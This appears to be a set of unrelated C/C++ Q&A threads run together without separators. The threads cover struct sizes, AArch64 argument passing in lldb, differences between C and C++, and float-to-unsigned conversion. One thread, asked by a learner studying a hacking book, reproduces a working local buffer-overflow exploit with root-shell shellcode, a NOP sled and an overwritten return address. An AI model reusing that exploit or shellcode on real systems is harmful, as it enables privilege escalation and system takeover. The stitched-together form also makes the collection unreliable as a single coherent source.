I know there is a mistake in my code because I didn't allocate any memory. But I'm curious why sizeof(struct node) shows 16 on my computer even though I haven't allocated any memory yet.
#include <stdio.h>
#include <stdlib.h>

struct node
{
    int data;
    struct node *next;
};

int main(int argc, char const *argv[])
{
    printf("%zu\n", sizeof(struct node));
    return 0;
}
I thought it would return a size of zero, but that didn't happen. Can you explain why sizeof(struct node) returns 16?
You don't say if you're working in C or C++, but sizeof semantics are similar in this case, regardless.
https://en.cppreference.com/w/cpp/language/sizeof is a good place to start.
sizeof(type) returns the size in bytes of the object representation of type.
It tells you how much memory you will need to allocate for one of those things. The information (the size of the type) is known at compile time, so there's no reason you can't get it without actually allocating memory.
And in fact if you were to allocate memory with malloc:
myNode = malloc(sizeof(struct node));
In that line of code, sizeof(struct node) is being calculated before memory is allocated. It's calculated at compile time, so that the code generated is essentially malloc(16).
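As for why the result is 16 on your machine: on a typical 64-bit platform (an assumption, since it depends on your ABI), int is 4 bytes and a pointer is 8, so the compiler inserts 4 bytes of padding after data to keep next aligned on an 8-byte boundary. A minimal sketch that makes the layout visible:

#include <stdio.h>
#include <stddef.h>

struct node
{
    int data;          /* 4 bytes on typical platforms */
                       /* 4 bytes of padding on a typical 64-bit ABI */
    struct node *next; /* 8 bytes on a 64-bit platform */
};

int main(void)
{
    printf("%zu\n", offsetof(struct node, data)); /* 0 */
    printf("%zu\n", offsetof(struct node, next)); /* 8, not 4 */
    printf("%zu\n", sizeof(struct node));         /* 16 */
    return 0;
}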
I've been focused on this book for several years, trying to get through it slowly but surely by understanding all of the details. However, I've hit a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads: for(i = 0; i < 160; i += 4).
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
    "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
    "\xe1\xcd\x80";

int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200);                 // Zero out the new memory.

    strcpy(command, "./notesearch \'");  // Start command buffer.
    buffer = command + strlen(command);  // Set buffer at the end.

    if (argc > 1)                        // Set offset.
        offset = atoi(argv[1]);

    ret = (unsigned int) &i - offset;    // Set return address.

    for (i = 0; i < 160; i += 4)         // Fill buffer with return address.
        *((unsigned int *) (buffer + i)) = ret;

    memset(buffer, 0x90, 60);            // Build NOP sled.
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);

    strcat(command, "\'");

    system(command);                     // Run exploit.
    free(command);
}
What I don't understand about this line of code is the specific value of 160 chosen by the author. Why is the value 160? Can someone please explain the logic to me?
Going through GDB, I figured out that changing the value from 160 to a lower value keeps the starting location of the NOP sled in the buffer the same, but fewer bytes are written to memory. With fewer bytes written, the target's saved return address may or may not be overwritten, because the repeated return address may no longer reach it; this depends on how much the value is lowered, if I understand correctly. However, this still confuses me: the comment itself states that the loop fills the buffer with the return address, which makes it sound as though the value 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added it to the length of the initial command (15 bytes, not including the escape character), coming to a value of 50; adding that to 160 gives 210, which definitely doesn't make sense to me, since 210 would be beyond the allocated heap size of 200.
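For reference, tracing the writes shows that they overlap rather than accumulate: the memset and memcpy overwrite the first 95 of the 160 bytes the loop wrote. This is the layout I get (note strlen("./notesearch '") is 14, counting the escaped quote as one byte, and assuming the repeated return address contains no zero byte, so strcat appends at offset 160):

/*
 * Layout of the 200 bytes from malloc(200) after all the writes:
 *
 *   command[0..13]   "./notesearch '"          14 bytes; buffer starts at 14
 *   buffer[0..59]    0x90 NOP sled             memset overwrites the first 60
 *                                              bytes of repeated return address
 *   buffer[60..94]   shellcode                 35 bytes (sizeof(shellcode) - 1)
 *   buffer[95..159]  repeated return address   the surviving tail of the 160
 *                                              bytes written by the for loop
 *   buffer[160]      '\''                      closing quote from strcat
 *   buffer[161]      '\0'                      terminator
 *
 * 14 + 160 + 1 + 1 = 176 of the 200 allocated bytes are used.
 */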
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.
In order to debug a macOS program I need to print the NSRect that is passed to -[NSView setNeedsDisplayInRect:]. I can set a breakpoint in that method, but I have trouble printing its argument.
NSRect is “essentially” a struct of four doubles. To demonstrate the problem I have written a small self-contained program. It is compiled with Xcode 12.5 and run on a Mac mini with an M1 processor.
#include <stdio.h>

typedef struct {
    double a;
    double b;
    double c;
    double d;
} MyRect1;

typedef struct {
    double a;
    double b;
    double c;
    long d;
} MyRect2;

void foo(MyRect1 rect) {
    printf("%f\n", rect.a);
}

void bar(MyRect2 rect) {
    printf("%f\n", rect.a);
}

int main(int argc, const char * argv[]) {
    MyRect1 rect1 = { 1, 2, 3, 4 };
    MyRect2 rect2 = { 1, 2, 3, 4 };
    foo(rect1);
    bar(rect2);
    return 0;
}
The Procedure Call Standard for the ARM 64-bit Architecture (AArch64) states that
If the argument type is a Composite Type that is larger than 16 bytes, then the argument is copied to memory allocated by the caller and the argument is replaced by a pointer to the copy.
Therefore I would expect that both foo() and bar() are called with a pointer to the structure as the single argument. Setting a breakpoint in bar() and casting the first argument to MyRect2 * indeed produces the expected result:
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100003e94 argtest2`bar(rect=(a = 1, b = 2, c = 3, d = 4)) at main.c:22:29
frame #1: 0x0000000100003f34 argtest2`main(argc=1, argv=0x000000016fdff428) at main.c:29:9
frame #2: 0x000000019871d430 libdyld.dylib`start + 4
(lldb) expr -- *(MyRect2 *)$arg1
(MyRect2) $0 = (a = 1, b = 2, c = 3, d = 4)
However, this does not work with MyRect1 in foo():
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100003e64 argtest2`foo(rect=(a = 1, b = 2, c = 3, d = 4)) at main.c:18:29
frame #1: 0x0000000100003f1c argtest2`main(argc=1, argv=0x000000016fdff428) at main.c:28:9
frame #2: 0x000000019871d430 libdyld.dylib`start + 4
(lldb) expr -- *(MyRect1 *)$arg1
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory
Note that both structs have the same size (32 bytes), and differ only in the last member.
Question: How can I print the argument passed to a function in lldb if that argument is of type NSRect (or any other struct of four doubles)?
Switching the double for the long in your structure was actually significant. A struct of four doubles is a Homogeneous Floating-point Aggregate, whereas the struct of three doubles and a long is a Composite Type, and they have different passing rules. The former is passed in the floating-point registers if it fits (as you have found), whereas the latter is copied to caller-allocated memory and passed by pointer, which is why casting $arg1 worked for MyRect2 but not for MyRect1.
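Since a four-double HFA arrives in the SIMD registers d0 through d3 (per AAPCS64), you can recover the rectangle at a breakpoint on the function by reading those registers directly, along the lines of (exact output formatting varies by lldb version):

(lldb) register read d0 d1 d2 d3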
BTW, if you want to read the values passed into a function for which you don't have debug information, it's best to stop before the "function prologue" has been executed. The function prologue (especially in optimized code) will often copy registers from their original locations, and reuse them, so the register state after the prologue will no longer reflect the calling conventions.
However, debug information for functions is generally not accurate during the prologue. There's no technical reason why it can't be, but no compilers I know of track the prologue, and unless you are actually debugging the compiler output that region of code isn't terribly interesting. So for code with debug information it's more convenient to stop after the prologue is executed, and that's the lldb default.
To switch that default, add --skip-prologue 0 to your break set command.
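For example, to stop in the foo from the program above before its prologue runs, something like:

(lldb) break set --name foo --skip-prologue 0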
C and C++ have many differences, and not all valid C code is valid C++ code.
(By "valid" I mean standard code with defined behavior, i.e. not implementation-specific/undefined/etc.)
Is there any scenario in which a piece of code valid in both C and C++ would produce different behavior when compiled with a standard compiler in each language?
To make it a reasonable/useful comparison (I'm trying to learn something practically useful, not to try to find obvious loopholes in the question), let's assume:
Nothing preprocessor-related (which means no hacks with #ifdef __cplusplus, pragmas, etc.)
Anything implementation-defined is the same in both languages (e.g. numeric limits, etc.)
We're comparing reasonably recent versions of each standard (say, C90 and C++98 or later)
If the versions matter, then please mention which versions of each produce different behavior.
Here is an example that takes advantage of the difference between function calls and object declarations in C and C++, as well as the fact that C90 allows the calling of undeclared functions:
#include <stdio.h>

struct f { int x; };

int main() {
    f();
}

int f() {
    return printf("hello");
}
In C++ this will print nothing because a temporary f is created and destroyed, but in C90 it will print hello because functions can be called without having been declared.
In case you were wondering about the name f being used twice: the C and C++ standards explicitly allow this. To use the structure you have to say struct f to disambiguate; leaving off struct gets you the function.
For C++ vs. C90, there's at least one way to get different behavior that's not implementation defined. C90 doesn't have single-line comments. With a little care, we can use that to create an expression with entirely different results in C90 and in C++.
int a = 10 //* comment */ 2
+ 3;
In C++, everything from the // to the end of the line is a comment, so this works out as:
int a = 10 + 3;
Since C90 doesn't have single-line comments, only the /* comment */ is a comment. The first / and the 2 are both parts of the initialization, so it comes out to:
int a = 10 / 2 + 3;
So, a correct C++ compiler will give 13, but a strictly correct C90 compiler will give 8. Of course, I just picked arbitrary numbers here -- you can use other numbers as you see fit.
The following, valid in C and C++, is going to (most likely) result in different values in i in C and C++:
int i = sizeof('a');
See Size of character ('a') in C/C++ for an explanation of the difference.
Another one from this article:
#include <stdio.h>

int sz = 80;

int main(void)
{
    struct sz { char c; };

    int val = sizeof(sz);  // sizeof(int) in C,
                           // sizeof(struct sz) in C++
    printf("%d\n", val);
    return 0;
}
C90 vs. C++11 (int vs. double):
#include <stdio.h>

int main()
{
    auto j = 1.5;
    printf("%d", (int)sizeof(j));
    return 0;
}
In C, auto is a storage-class specifier meaning the variable is local, and in C90 it's OK to omit the type of a variable or function, which then defaults to int. In C++11, auto means something completely different: it tells the compiler to infer the type of the variable from the value used to initialize it.
Another example that I haven't seen mentioned yet, this one highlighting a preprocessor difference:
#include <stdio.h>

int main()
{
#if true
    printf("true!\n");
#else
    printf("false!\n");
#endif
    return 0;
}
This prints "false" in C and "true" in C++ - In C, any undefined macro evaluates to 0. In C++, there's 1 exception: "true" evaluates to 1.
Per the C++11 standard:
a. The comma operator performs lvalue-to-rvalue conversion in C but not in C++:
char arr[100];
int s = sizeof(0, arr); // The comma operator is used.
In C++ the value of this expression will be 100 and in C this will be sizeof(char*).
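A complete program to observe this (compile the same file once as C and once as C++):

#include <stdio.h>

int main(void)
{
    char arr[100];
    /* C: the comma expression decays arr to char *, so this prints
       sizeof(char *), often 8. C++: the result is the array lvalue
       itself, so this prints 100. */
    printf("%d\n", (int)sizeof(0, arr));
    return 0;
}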
b. In C++ the type of enumerator is its enum. In C the type of enumerator is int.
enum E { a, b, c };
sizeof(a) == sizeof(int); // In C
sizeof(a) == sizeof(E); // In C++
This means that sizeof(int) may not be equal to sizeof(E).
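A complete program to compare the two (the printed values may coincide, since the implementation may well pick int as E's underlying type):

#include <stdio.h>

enum E { a, b, c };

int main(void)
{
    /* C: a has type int, so the first value is sizeof(int).
       C++: a has type E, so the two values are always equal. */
    printf("%d %d\n", (int)sizeof(a), (int)sizeof(enum E));
    return 0;
}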
c. In C++ a function declared with an empty parameter list takes no arguments. In C an empty parameter list means that the number and types of the function parameters are unknown.
int f(); // int f(void) in C++
// int f(*unknown*) in C
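A short program that this rule makes valid C but ill-formed C++ (a sketch):

int f();  /* C: parameters unknown; C++: takes no arguments */

int main(void)
{
    /* Accepted in C, where the declaration above says nothing about
       the parameters; a compile-time error in C++, where f() takes
       none and no other declaration of f is visible here. */
    return f(1, 2, 3);
}

int f(int a, int b, int c) { return a + b + c; }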
This program prints 1 in C++ and 0 in C:
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int d = (int)(abs(0.6) + 0.5);
    printf("%d", d);
    return 0;
}
This happens because C++ has a double abs(double) overload, so abs(0.6) returns 0.6, while in C it returns 0 because of the implicit double-to-int conversion before invoking int abs(int). In C, you have to use fabs to work with double.
#include <stdio.h>

int main(void)
{
    printf("%d\n", (int)sizeof('a'));
    return 0;
}
In C, this prints whatever the value of sizeof(int) is on the current system, which is typically 4 on systems in common use today.
In C++, this must print 1.
Another sizeof trap: boolean expressions.
#include <stdio.h>

int main() {
    printf("%d\n", (int)sizeof !0);
}
It equals sizeof(int) in C, because the expression is of type int, but it is typically 1 in C++ (though that's not required). In practice the two are almost always different.
An old chestnut that depends on the C compiler not recognizing C++ end-of-line comments...
...
int a = 4 //* */ 2
+2;
printf("%i\n",a);
...
The C++ Programming Language (3rd Edition) gives three examples:
sizeof('a'), as @Adam Rosenfield mentioned;
// comments being used to create hidden code:
int f(int a, int b)
{
    return a //* blah */ b
        ;
}
Structures etc. hiding names in outer scopes, as in your example.
Another one, listed in the C++ Standard:
#include <stdio.h>

int x[1];

int main(void) {
    struct x { int a[2]; };
    /* size of the array in C */
    /* size of the struct in C++ */
    printf("%d\n", (int)sizeof(x));
}
Inline functions in C default to external linkage, whereas those in C++ do not. Compiling the following two files together prints "I am inline" in the case of GNU C, but nothing for C++.
File 1
#include <stdio.h>

struct fun{};

int main()
{
    fun(); // In C, this calls the inline function from file 2, whereas in C++
           // it creates and destroys a temporary struct fun object.
    return 0;
}
File 2
#include <stdio.h>

inline void fun(void)
{
    printf("I am inline\n");
}
Also, C++ implicitly gives any const global internal linkage (as if it were static) unless it is explicitly declared extern, unlike C, in which extern is the default.
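A minimal two-file sketch of that linkage difference (hypothetical file names; build the two files together):

/* file1.c or file1.cpp */
const int limit = 42;    /* external linkage in C; internal in C++ */

/* file2.c or file2.cpp */
#include <stdio.h>

extern const int limit;  /* resolves against file1 when built as C, but is
                            an undefined symbol when built as C++, unless
                            file1 writes 'extern const int limit = 42;' */

int main(void)
{
    printf("%d\n", limit);
    return 0;
}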
#include <stdio.h>

struct A {
    double a[32];
};

int main() {
    struct B {
        struct A {
            short a, b;
        } a;
    };
    printf("%d\n", (int)sizeof(struct A));
    return 0;
}
This program prints 256 (32 * sizeof(double), with 8-byte doubles) when compiled using a C++ compiler and 4 when compiled using a C compiler.
This is because C does not have the notion of scope resolution. In C, a structure declared inside another structure is simply placed in the enclosing scope (there is no B::A), so the inner struct A hides the outer one.
struct abort
{
    int x;
};

int main()
{
    abort();
    return 0;
}
Returns with an exit code of 0 in C++, since the statement just creates and destroys a temporary struct abort; in C the call reaches the standard library's abort(), which on my system terminates with exit code 3.
This trick could probably be used to do something more interesting, but I couldn't think of a good way of creating a constructor that would be palatable to C. I tried making a similarly boring example with the copy constructor, that would let an argument be passed, albeit in a rather non-portable fashion:
struct exit
{
    int x;
};

int main()
{
    struct exit code;
    code.x = 1;
    exit(code);
    return 0;
}
VC++ 2005 refused to compile that in C++ mode, though, complaining about how "exit code" was redefined. (I think this is a compiler bug, unless I've suddenly forgotten how to program.) It exited with a process exit code of 1 when compiled as C though.
Don't forget the distinction between the C and C++ global namespaces. Suppose you have a foo.cpp
#include <cstdio>

void foo(int r)
{
    printf("I am C++\n");
}
and a foo2.c
#include <stdio.h>

void foo(int r)
{
    printf("I am C\n");
}
Now suppose you have a main.c and main.cpp which both look like this:
extern void foo(int);

int main(void)
{
    foo(1);
    return 0;
}
When compiled as C++, it will use the symbol in the C++ global namespace; in C it will use the C one:
$ diff main.cpp main.c
$ gcc -o test main.cpp foo.cpp foo2.c
$ ./test
I am C++
$ gcc -o test main.c foo.cpp foo2.c
$ ./test
I am C
int main(void) {
    const int dim = 5;
    int array[dim];
}
This is rather peculiar in that it is valid in C++ and in C99, C11, and C17 (though support is optional in C11 and C17), but not valid in C89.
In C99 and later it creates a variable-length array, which has its own peculiarities compared with normal arrays: it has a runtime type instead of a compile-time type, and sizeof array is not an integer constant expression in C. In C++ the type is wholly static.
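A small illustration of that difference (a sketch; both languages print 20 with 4-byte int, but only C computes it at run time):

#include <stdio.h>

int main(void)
{
    const int dim = 5;  /* a constant expression in C++, but not in C */
    int array[dim];     /* VLA in C99+; ordinary array in C++ */

    /* Evaluated at run time in C; a compile-time constant in C++. */
    printf("%zu\n", sizeof array);
    return 0;
}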
If you try to add an initializer here:
int main(void) {
    const int dim = 5;
    int array[dim] = {0};
}
This is valid C++ but not C, because a variable-length array cannot have an initializer.
Empty structures have size 0 in C (as a GNU extension; strictly speaking, ISO C doesn't allow a struct with no members) and size 1 in C++:
#include <stdio.h>

typedef struct {} Foo;

int main()
{
    printf("%zu\n", sizeof(Foo));
    return 0;
}
This concerns lvalues and rvalues in C and C++.
In the C programming language, both the pre-increment and the post-increment operators return rvalues, not lvalues. This means that they cannot be on the left side of the = assignment operator. Both these statements will give a compiler error in C:
int a = 5;
a++ = 2; /* error: lvalue required as left operand of assignment */
++a = 2; /* error: lvalue required as left operand of assignment */
In C++ however, the pre-increment operator returns an lvalue, while the post-increment operator returns an rvalue. It means that an expression with the pre-increment operator can be placed on the left side of the = assignment operator!
int a = 5;
a++ = 2; // error: lvalue required as left operand of assignment
++a = 2; // No error: a is assigned 2!
Now why is this so? The post-increment increments the variable, and it returns the variable's value as it was before the increment happened. That is just an rvalue: the former value of the variable is copied into a temporary, then a is incremented, and the expression yields that former value, which no longer represents the current content of the variable.
The pre-increment first increments the variable and then returns the variable as it is after the increment. In this case we do not need to store the old value in a temporary; we just use the variable's new value after it has been incremented. So the pre-increment returns an lvalue: the variable a itself. Of course, we can also use this lvalue as a value, as in the two statements below; that use is an implicit conversion of the lvalue into an rvalue.
int x = a;
int x = ++a;
Since the pre-increment returns an lvalue, we can also assign something to it. The following two statements leave a with the same final value; in the second assignment, first a is incremented, then its new value is overwritten with 2.
int a;
a = 2;
++a = 2; // Valid in C++.
The compiler I use is g++ (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4.
I compile my programs with the following command:
g++ -std=c++11 -pedantic -Wall program.cpp
The program no. 1.:
#include <iostream>
using namespace std;

int main() {
    unsigned int b;
    b = -54;
    cout << b << endl;
    return 0;
}
The program prints 4294967242, and this is the value I expected, because this is the case when we assign an out-of-range value to a variable of unsigned type, and the stored result is reduced modulo 2^32 (UINT_MAX + 1).
The program no. 2.:
#include <iostream>
using namespace std;

int main() {
    unsigned int b;
    b = 54.1234;
    cout << b << endl;
    return 0;
}
The program prints 54, and this is also OK, because the stored value is the part before the decimal point, and the fractional part is truncated.
The program no. 3.:
#include <iostream>
using namespace std;

int main() {
    unsigned int b;
    b = -54.1234;
    cout << b << endl;
    return 0;
}
Here during compilation I get the warning "overflow in implicit constant conversion".
And the program prints 0. Why is it so? I thought that it will do the truncation of the fractional part (as in program 2) and then store the result of the modulo division (as in program 1).
But if I write program no. 4:
#include <iostream>
using namespace std;

int main() {
    unsigned int b;
    float k = -54.1234;
    b = k;
    cout << b << endl;
    return 0;
}
then I get no warning, and I get the result I expected, 4294967242, which is again the result of the modulo reduction.
I would be grateful if somebody can explain it to me.
Why doesn't program no. 3 behave like program no. 4? And why don't I get a warning when compiling program no. 1, but I do get one when compiling program no. 3?
According to the standard (§ [conv.fpint]):
A prvalue of a floating point type can be converted to a prvalue of an integer type. The conversion truncates; that is, the fractional part is discarded. The behavior is undefined if the truncated value cannot be represented in the destination type.
So, your -54.1234 is truncated to -54. Since that can't be represented in an unsigned, you get undefined behavior.
When converting floating point numbers to integers, C and C++ round floating point numbers towards zero. The rounded result must then be representable in the destination type.
As a result, for 32 bit unsigned int the conversion is guaranteed to give the correct result if -1 < x < 2^32. For smaller numbers there are no guarantees. Since numbers between -1 and 0 must be rounded to zero, and numbers -1 and smaller have no requirements, it wouldn't be surprising if the compiler checks whether x < 0 and gives a result of 0 in that case. (The compiler might check whether x < 1 and give a result of 0; this handles very small positive numbers as well).
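If you want the wrap-around result reliably, avoid the undefined floating-point-to-unsigned step and go through a signed integer first; a sketch:

#include <stdio.h>

int main(void)
{
    double d = -54.1234;

    /* double -> int truncates toward zero to -54, which is defined
       because -54 fits in int; int -> unsigned int then wraps modulo
       2^32, which is always defined. */
    unsigned int b = (unsigned int)(int)d;

    printf("%u\n", b);  /* 4294967242 with a 32-bit unsigned int */
    return 0;
}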